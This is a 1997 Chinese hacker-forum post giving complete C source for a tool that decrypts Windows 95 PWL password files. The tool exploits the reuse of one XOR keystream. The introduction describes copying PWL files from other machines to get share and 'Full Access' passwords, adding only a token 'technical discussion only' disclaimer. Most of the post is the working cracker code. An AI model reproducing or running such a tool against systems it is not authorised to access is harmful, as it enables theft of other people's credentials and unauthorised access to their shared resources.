发信人: badle()
整理人: starseacn(2001-09-21 21:24:48), 站内信件
发信人: raner (lilo), 信区: Hacker
标 题: glide程序的改进
发信站: BBS 水木清华站 (Tue Aug 19 11:36:26 1997)
由 Registration Database (system.dat) 极易解出 Shared Directory, 因此若 Win95
目录被共享(不需口令)则解出其余需口令的目录 Easy FM! 但若 Win95 目录没共享呢?
Answer is: to use glide. 将别的机器上的 PWL 文件拷回来, 用 glide 解其资源, 很
有可能找到你所需的 password, 甚至是 Full Access Password (仅为技术讨论 :-) )
但 glide 程序在反解资源指针时有点问题, 以下程序为对其的改进。在
password 未知情况下的反解并不能保证对 (这种反解利用了 M$ 的愚蠢的错误: 将同一
XOR 密钥流用于加密同一文件中的许多不同串, 于是已知的明文位置就泄露了密钥流), 但在大多情况下应没问题.
================ PWL.CPP 1997.8.16 =====================
// Compiled with BC 3.1
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <dir.h>
/* Raw bytes of the PWL file currently being processed (about 10K is enough). */
unsigned char Data[10001];
/* Recovered XOR key stream; only the first `cracked` bytes are meaningful. */
unsigned char keystream[1001];
/* Rpoint[i] is the file offset of resource i; Rpoint[maxr] is set to `size`. */
int Rpoint[300];
/* Number of bytes read into Data. */
int size;
/* Resource-slot count (rounded up to a multiple of 16), or -1 when none. */
int maxr;
/* Number of leading key stream bytes recovered so far. */
int cracked;
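/*
 * Recover the key stream bytes that cover the resource pointer table
 * (keystream[20 .. 20 + 2*maxr + 1]).
 *
 * Globals read:
 *   Data, size          - the PWL file bytes and their count
 *   keystream[0..1]     - XOR mask applied to every 16-bit resource length
 *   Data[0x109..0x207]  - resource index; 0xff marks an unused slot
 * Globals written:
 *   Rpoint[0..maxr]     - start offset of each resource, Rpoint[maxr] == size
 *   maxr                - -1 when the file holds no resource, otherwise the
 *                         highest index value rounded up to a multiple of 16
 *   keystream, cracked  - table bytes are folded in, cracked += 2*maxr + 2
 *
 * Layout assumed here: each resource starts with a 2-byte length encrypted
 * with the same mask as the header length, followed by the resource data.
 * Because one key stream is reused for the pointer table and for every
 * resource, locating where each resource starts yields the table's
 * plaintext and therefore the key stream bytes that covered it.  The
 * search is heuristic (it accepts the first plausible length value), so
 * the result is not guaranteed when the password is unknown.
 */
void RecoverKeyStream()
{
    int sizemask, i, rsz, pos;
    int Rall[300];   /* Rall[k]: how many index entries hold the value k */
    int keylen, len;

    /* find allocated resources */
    sizemask = keystream[0] + (keystream[1] << 8);
    for (i = 0; i < 256; i++) Rall[i] = 0;
    maxr = -1;
    for (i = 0x109; i < 0x208; i++) {
        if (Data[i] != 0xff) {
            Rall[Data[i]]++;
            if (Data[i] > maxr) maxr = Data[i];
        }
    }
    if (maxr == -1) return;            /* no resource */
    maxr = ((maxr / 16) + 1) * 16;
    /* resource pointer table size appears to be divisible by 16 */

    /* search for resources */
    keylen = 2 * maxr + 20 + 2;
    Rpoint[0] = 0x0208 + keylen;       /* first resource */
    for (i = 0; i < maxr; i++) {
        /* find size of current resource: two bytes must be available */
        pos = Rpoint[i];
        if (pos + 1 >= size) {
            printf("Decrypt pwl file error!\n");
            maxr = i;
            break;
        }
        rsz = Data[pos] + (Data[pos + 1] << 8);
        rsz ^= sizemask;
        pos += rsz + 2;
        if (i < maxr - 1) {
            /* stop while a full 2-byte length still fits in the buffer */
            while (pos + 1 < size) {
                /* Read the length byte-wise, like the header length above.
                 * The original *(unsigned int *)(Data + pos) only reads two
                 * bytes where int is 16 bits (Borland C 3.1); on any other
                 * platform it reads four and is a misaligned/aliasing access. */
                len = (Data[pos] + (Data[pos + 1] << 8)) ^ sizemask;
                if (Rall[i + 1] == 0 && len == 0)
                    break;                    /* correct position */
                if (Rall[i + 1] > 0 && len >= 2 && len <= keylen)
                    break;                    /* may be correct position ? */
                pos += 2;                     /* else, increase by 2 */
            }
        }
        Rpoint[i + 1] = pos;
    }
    Rpoint[maxr] = size;

    /* insert table data into keystream: the table is the little-endian
     * list of resource offsets, so XOR-ing it in cancels the plaintext */
    for (i = 0; i <= maxr; i++) {
        keystream[20 + 2 * i] ^= Rpoint[i] & 0x00ff;
        keystream[21 + 2 * i] ^= (Rpoint[i] >> 8) & 0x00ff;
    }
    cracked += maxr * 2 + 2;
}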
/*
 * Print every recovered resource as text by XOR-ing its stored bytes with
 * the recovered key stream.  Only the first `cracked` bytes of a resource
 * can be decrypted (that is how much key stream is known), so longer
 * resources are shown truncated; bytes outside printable ASCII print as '.'.
 *
 * Globals read: Rpoint, maxr, cracked, Data, keystream.
 */
void DecryptResources()
{
    int idx;

    for (idx = 0; idx < maxr; idx++) {
        int start = Rpoint[idx];
        int len = Rpoint[idx + 1] - start;
        int k;

        if (len > cracked)
            len = cracked;             /* no key stream beyond this point */
        if (len <= 2)
            continue;                  /* nothing but the length field */

        printf("Recource[%02d] (length: %02d)\n", idx, len);
        for (k = 0; k < len; k++) {
            unsigned char plain = Data[start + k] ^ keystream[k];
            if (plain < 0x20 || plain > 0x7e)
                plain = '.';
            putchar(plain);
        }
        putchar('\n');
    }
}
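/*
 * Entry point.  For every file matching argv[1] (a DOS wildcard such as
 * *.pwl): read it into Data, seed the key stream with the bytes that follow
 * the 0x208-byte header XOR-ed with the upper-cased file name (the PWL
 * file name is the user name, which is the first 20 bytes of key stream
 * plaintext), recover more key stream from the resource pointer table and
 * print the decrypted resources.
 *
 * Returns 0, or 1 when no file pattern was given.  findfirst/findnext and
 * struct ffblk come from Borland's <dir.h>; this is DOS/Win16-only code.
 */
int main(int argc, char *argv[])
{
    struct ffblk ffblk;
    int i, done, nfile = 0;
    FILE *fd;
    char *name;
    int ch;

    if (argc < 2) {
        printf("Usage: Pwl pwlfile(s) (eg: *.pwl)");
        return 1;
    }
    done = findfirst(argv[1], &ffblk, 0);
    while (!done) {
        name = ffblk.ff_name;
        printf("\n-----------File %2d: %11s------------\n", ++nfile, name);
        /* read PWL file */
        fd = fopen(name, "rb");
        if (fd == NULL) {
            printf("can't open file %s", name);
        } else {
            /* Bounded read: the original feof() loop wrote past the end of
             * Data on files larger than the buffer.  One byte is kept spare
             * so the 2-byte length reads in RecoverKeyStream stay inside it. */
            size = (int)fread(Data, 1, sizeof(Data) - 1, fd);
            if (size == (int)(sizeof(Data) - 1) && fgetc(fd) != EOF)
                printf("warning: file larger than %u bytes, truncated\n",
                       (unsigned)(sizeof(Data) - 1));
            fclose(fd);

            if (size < 0x208) {
                /* the header alone is 0x208 bytes; on a shorter file
                 * RecoverKeyStream would read stale bytes left over from
                 * the previous file */
                printf("File too short to be a PWL file!\n");
            } else {
                /* copy encrypted text into keystream */
                cracked = size - 0x0208;
                if (cracked > 1000) cracked = 1000;
                memcpy(keystream, Data + 0x208, cracked);

                /* generate 20 bytes of keystream: the user name (file name
                 * without extension, upper-cased) is known plaintext */
                for (i = 0; i < 20; i++) {
                    ch = toupper((unsigned char)name[i]);
                    if (ch == 0) break;
                    if (ch == '.') break;
                    keystream[i] ^= (unsigned char)ch;   /* xor UserName */
                }
                cracked = 20;

                RecoverKeyStream();     /* recover key stream (54 bytes or more) */
                if (maxr == -1)
                    printf("No resource!\n");
                else
                    DecryptResources();
            }
        }
        done = findnext(&ffblk);
    }
    return 0;
}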
--
※ 来源:·BBS 水木清华站 bbs.net.tsinghua.edu.cn·[FROM: 166.111.5.15]
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.101.155.44]